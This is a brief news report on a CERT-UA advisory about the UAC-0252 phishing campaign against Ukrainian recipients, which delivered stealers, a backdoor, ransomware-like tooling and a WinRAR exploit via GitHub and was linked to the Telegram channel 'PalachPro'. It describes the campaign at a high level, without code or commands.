CERT-UA said it has observed multiple cases of phishing emails starting in January 2026, allegedly sent on behalf of central executive authorities and regional administrations. The messages urge recipients to urgently update mobile applications used in widely deployed civilian and military systems.
According to the Ukrainian cybersecurity agency, the emails may contain an attachment in the form of an archive with an EXE file or a link to a legitimate but XSS-vulnerable website. Visiting such a site triggers the execution of malicious JavaScript code, which subsequently downloads an executable file onto the victim’s computer. The EXE files and scripts are hosted on the legitimate service GitHub.
During January–February 2026, CERT-UA observed several malware tools, including SHADOWSNIFF (a stealer distributed via GitHub), SALATSTEALER (a malware-as-a-service stealer), and DEAFTICK (a primitive backdoor written in Go).
While analyzing one of the GitHub repositories, researchers also identified a program exhibiting characteristics of ransomware under the internal name “AVANGARD ULTIMATE v6.0,” as well as an archive containing an exploit for a WinRAR vulnerability (CVE-2025-8088). Last August, cybersecuirty firm ESET reported that this flaw was exploited in the wild by Russia-aligned group RomCom.
Based on a detailed analysis of the infrastructure, tooling, and publicly available, CERT-UA has linked the activity to the Telegram channel “PalachPro.” The campaign is being tracked under the identifier UAC-0252.